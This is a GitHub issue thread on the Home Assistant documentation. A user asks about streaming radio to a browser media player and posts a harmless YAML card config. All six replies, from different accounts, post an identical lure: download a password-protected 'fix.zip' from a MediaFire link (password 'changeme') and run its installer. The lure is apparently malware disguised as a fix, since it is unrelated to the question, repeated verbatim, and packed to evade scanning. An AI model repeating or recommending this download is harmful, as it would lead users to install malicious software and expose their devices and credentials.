### ISSUE TITLE
browser media player

### ISSUE THREAD

**Issue by joramos21** [home-assistant/home-assistant.github.io#34450]
### Feedback

Hi,
Radio Browser is really awesome. It would be perfet if it would be possible to save favorites.
As there is no such feature, I could do it without Radio Browser :-( but there is something I'm not able to do. I made it this way and I find all my media players (here my LG tv media_player.lg_webos_tv_oled42c48la) but I'm lacking what is really important for me that is streaming to the browser (Radio browser offers that possibility). It is important because then I can stream to speakers that are connected to my device (tablet on which the companion app is installed) via bluetooth :

entities:
  - entity: media_player.lg_webos_tv_oled42c48la
    icon: null
    min_volume: 5
    name: null
    type: custom:mini-media-player
    info: scroll
    source: full
    hide:
      volume: false
      source: false
      power_state: false
      name: false
      icon: false
      info: false
    shortcuts:
      columns: 4
      column_height: 80
      buttons:
        - name: null
          cover: /local/radio_couleur3_logo.png
          type: radio
          id: http://stream.srg-ssr.ch/m/couleur3/mp3_128
        - name: null
          cover: https://www.rts.ch/hbv7/static/images/favicon/rts/152x152.png
          type: playlist
          id: http://stream.srg-ssr.ch/m/la-1ere/mp3_128
        - name: null
          cover: https://qmusic.nl/favicon.ico
          type: playlist
          id: https://icecast-qmusicnl-cdp.triple-it.nl/Qmusic_nl_live_96.mp3
        - name: null
          cover: >-
            https://new-api.grootnieuwsradio.nl/cache/i/0/images/3.w80.r1-1.5749681.q90.webp
          type: playlist
          id: https://27863.live.streamtheworld.com/GNRNONSTOP.mp3
        - name: null
          cover: https://www.grootnieuwsradio.nl/favicons/favicon-1-180x180.png
          type: playlist
          id: >-
            https://playerservices.streamtheworld.com/api/livestream-redirect/GNR.mp3
        - name: null
          cover: https://www.nporadio5.nl/apple-touch-icon.png
          type: radio
          id: https://icecast.omroep.nl/radio5-bb-mp3
        - name: null
          cover: >-
            https://new-api.grootnieuwsradio.nl/cache/i/0/images/5.w80.r1-1.0db0463.q90.webp
          type: radio
          id: >-
            https://playerservices.streamtheworld.com/api/livestream-redirect/GNRBK.mp3
show_header_toggle: false
type: entities
state_color: true

Thank you very much for your help.

Good day

Jo

### URL

https://www.home-assistant.io/integrations/radio_browser/

### Version

2024.8.3

**Comment by xiaobai-marker** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Superming997** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by abdulhkeemGit** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by xcloudzy** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Lxx-c** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by WaveListenToMe** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."
